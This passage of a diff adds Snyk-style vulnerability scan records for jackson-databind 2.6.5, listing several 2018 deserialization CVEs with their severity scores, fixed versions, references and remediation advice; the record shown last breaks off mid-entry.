"upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ 
+ { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": 
"medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": 
"jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": 